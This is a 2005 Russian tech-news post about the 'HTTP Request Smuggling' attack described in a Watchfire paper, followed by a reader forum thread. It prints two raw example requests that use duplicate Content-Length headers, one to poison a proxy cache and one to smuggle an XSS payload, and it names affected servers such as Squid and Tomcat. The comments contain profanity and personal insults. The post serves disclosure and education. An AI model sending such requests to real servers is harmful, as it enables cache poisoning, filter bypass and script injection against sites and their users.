Группа исследователей опубликовала документ (http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf) описывающий новый вид атаки - "HTTP Request Smuggling" (HRS), направленный на подмену страниц в кеше прокси серверов и обход блокировок контент фильтров и фаерволов.

Идея метода - компоновка нескольких POST/GET запросов в рамках одного HTTP обращения, например:

1      POST http://SITE/foobar.html HTTP/1.1
2      Host: SITE
3      Connection: Keep-Alive  
4      Content-Type: application/x-www-form-urlencoded
5      Content-Length: 0
6      Content-Length: 44
7      [CRLF]
8      GET /poison.html HTTP/1.1
9      Host: SITE
10     Bla: [space after the "Bla:", but no CRLF]
11     GET http://SITE/page_to_poison.html HTTP/1.1
12     Host: SITE
13     Connection: Keep-Alive
14     [CRLF]

Пример 2:

1       POST /some_script.jsp HTTP/1.0
2       Connection: Keep-Alive
3       Content-Type: application/x-www-form-urlencoded
4       Content-Length: 9
5       Content-Length: 204
6  
7       this=thatPOST /vuln_page.jsp HTTP/1.0
8       Content-Type: application/x-www-form-urlencoded
9       Content-Length: 95
10  
11      param1=value1&data=<script></script>alert("stealing...

Сообщается, что проблеме подвержены Tomcat, squid (исправлено в Squid-2.5.STABLE9), apache (mod_proxy ?) и т.д.

URL: http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf
Новость: http://www.opennet.me/opennews/art.shtml?num=5619

• Новая техника HTTP атак,blackpepper, 10:00 , 14-Июн-05
• Новая техника HTTP атак,Банзай, 11:49 , 14-Июн-05
  • Новая техника HTTP атак,Skif, 12:50 , 14-Июн-05
    • Новая техника HTTP атак,toor99, 13:57 , 14-Июн-05
    • со снифферами в локалке? - до пезде дверь.,Банзай, 02:07 , 15-Июн-05
      • со снифферами в локалке? - до пезде дверь.,Алекс, 18:05 , 15-Июн-05
        • запросы к squid тоже на ssl? -  а у вас,Банзай, 20:04 , 23-Июн-05
          • запросы к squid тоже на ssl? -  а у вас,sith, 19:34 , 29-Июн-05
          • rtfm,guest, 02:09 , 30-Июл-05
• Новая техника HTTP атак,t0ly, 13:02 , 16-Июн-05

Вот это ..и т.д... заставляет задуматься

Хорошо сказано: "особенно зашибенный вред возможно причинить, находясь в одной локалке с компрометируемым бекендом".

Еще круто пробки в серверной выворачивать. Отказ в обслуживании будет называться.

>Хорошо сказано: "особенно зашибенный вред возможно причинить, находясь в одной локалке с
>компрометируемым бекендом".
>
>Еще круто пробки в серверной выворачивать. Отказ в обслуживании будет называться.

А вам никогда не приходилось закрываться даже от своих? Не приходилось бороться со снифферами в локалке? Менять почти каждую неджелю пароли, потому что народ не дремлет?
Так что это очень даже актуально. И прикалываться не стоит.
Потом, некоторые провайдеры нарезают клиентам сетки в 24 бита. И вася пупкин может оказаться в моей "локалке" только потому что пров один.

А еще бывают data centers. Стойки с хостинговыми серверами. С серверами, поставленными на colocation. И так далее; но он об этом не знает и не догадывается :)

1. Репутация колокейшена
2. SSL на все чувствительные соединения - обснифайся весь
3. Вилкам повыёбываться. Первый пакет нарушителя в "гандоны.лог", последующие в - дыру
4. О чем вы вообще?! Что за колокейшн, в котором вы не уверены относительно гарантий физического доступа к консоли?! Это осталось только в Трипиздищеве и Северной Корее.

запросы например к squid тоже на ssl?
вы видимо находитесь в юсе или канаде?  ибо в России дебилов,считающих перечисленные вами меры достаточными и применимыми к постоянному использованию уже давно неосталось
сударь,вы сильно напоминаете воинствующего дилетанта

squid на колокейшене?

И что он там делает?

http://cisco.opennet.ru/openforum/vsluhforumID12/434.html

Вот этого вам не хватает?

сударь,вы сильно напоминаете хобби-линуксиста из глухого селения.

squid на колокейшене может выполнять, например, функции ускорителя и балансировшика нагрузки; а вы, кстати, сильно напоминаете мудака.

squid-cache.org , google.com помогут Вам найти ответ на этот вопрос.

нравятся мне ваши дебаты... кратко, локонично, и без флуда что самое главное =)